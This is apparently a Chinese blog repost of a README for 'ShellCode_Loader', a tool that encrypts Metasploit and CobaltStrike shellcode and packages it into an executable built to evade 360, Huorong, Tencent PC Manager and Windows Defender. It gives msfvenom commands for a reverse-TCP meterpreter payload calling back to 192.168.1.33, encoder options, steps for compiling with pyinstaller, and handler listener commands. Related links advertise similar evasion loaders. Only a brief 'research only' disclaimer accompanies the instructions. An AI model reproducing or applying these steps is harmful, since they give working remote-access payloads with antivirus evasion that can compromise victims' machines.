ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器加密工具
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
文章目录
- ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
- 一、声明
- 二、测试环境
- 三、生成Msf_Payload
- 四、生成CobaltStrike_Payload
- 五、加密Payload
- 六、配置ShellCode加载器
- 七、打包可执行程序(EXE编译环境)
- 八、上线测试
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。
一、声明
该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!
代码未经过大量测试,如发现问题请提交 issue。
二、测试环境
截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)
Windows 7 64位 或以上操作系统应该都没问题(没有测试)
三、生成Msf_Payload
默认
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f py -o payload.c
XOR 编码器
msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
动态密钥XOR编码器
msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
Zutto Dekiru
msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.33 lport=8899 -f c -o payload.c
四、生成CobaltStrike_Payload
选择使用x64的C语言或Python语言的Shellcode。
得到:payload.c
五、加密Payload
Shellcode_encryption.exe payload.c
六、配置ShellCode加载器
将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode’处
示例:
七、打包可执行程序(EXE编译环境)
Python 3.8.6
pyinstaller 4.7
pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
pyinstaller -F -w ShellCode_Loader.py
生成ShellCode_Loader.exe在dist目录中。
八、上线测试
运行监听
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run
项目地址:
https://github.com/Axx8/ShellCode_Loader
ShellCode_Loader - MsfCobaltStrike免杀ShellCode加载器加密工具相关推荐
- 免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader
项目作者:HZzz 项目地址:https://github.com/HZzz2/go-shellcode-loader 一.工具介绍 GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF ...
- 免杀方法(四)Python免杀shellcode加载器
项目作者:HZzz2 项目地址:https://github.com/HZzz2/python-shellcode-loader 一.工具介绍 免杀方式 msfvenom生成raw格式的shellco ...
- 【工具分享】免杀360火绒的shellcode加载器
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...
- java 加载shellcode_通用Shellcode加载器
Shellcode加载器是一种基本的规避技术.尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为.例如,很多安全产品可能会在内 ...
- shellcode加载器--从入门到放弃
文章目录 重剑无锋--代码篇复现 1.C/C++(vs2019) (1).指针执行 shellcode放在data段 shellcode放在栈上,复制到堆上 shellcode放在web服务器上 使用 ...
- shellcode加载器
不能有全局变量 (其实也是使用了绝对地址) 不能使用常量字符串 char szBuffer[] = "ShellCode"; //会使用常量区,所以不可用//写成 char szB ...
- python类加载器_利用Python反序列化运行加载器实现免杀
前言 前几天在看Python的shellcode加载器,在网上找了一个,结果加载器自身就过不了火绒,测试发现是火绒对关键语句进行了识别. 所以我们要想办法去掉加载器中明显的特征. 原理及实现 在绕过静 ...
- php5.5 反序列化利用工具_利用Python反序列化运行加载器实现免杀
前言 前几天在看Python的shellcode加载器,在网上找了一个,结果加载器自身就过不了火绒,测试发现是火绒对关键语句进行了识别. 所以我们要想办法去掉加载器中明显的特征. 原理及实现 在绕过静 ...
- 附件携马之CS免杀shellcode过国内主流杀软
0x01 写在前面 其实去年已经写过类似的文章,但是久没用了,难免有些生疏.所谓温故而知新,因此再详细的记录一下,一方面可以给各位看官做个分享,另一方面等到用时也不至于出现临阵磨枪的尴尬场面. 0x0 ...
最新文章
- crontab 只执行一次_linux计划任务-单次任务(at)与循环任务(crontab)
- 这些个JAVA开源工具(那是相当地多啊)
- 不同类型社交应用发展分析
- 【python教程入门学习】六、python中字符串的常用方法
- 《徐徐道来话Java》:PriorityQueue和最小堆
- 【简单几句】应对焦虑
- ubuntu两个conda安装和切换
- springmvc 表单中文乱码解决方案
- 【CTF/MISC】图片隐写题(binwalk/foremost/010editer配合使用)
- stm32f4c语言编程,如何使用STM32F4的DSP库
- dnf修改服务器时间限制,DNF历史性革新,团本刷新时间改为周六,为黑鸦让路
- Keyence激光打标机入门1
- 串口(串行接口)相关概念
- 如何卸载PLC200软件---SETP7
- 汉字转【pinyin】
- Udacity Self-Driving Car的训练
- java 如何将word 转换为ftl_使用FreeMarker导出word文档(支持导出图片)
- SLAM:一:产品经理眼中的SLAM技术学习路径
- 中国电信上海电信光猫路由器设置和外接路由器
- 历年诺贝尔物理学奖获得者名单及研究领域(1901-2016)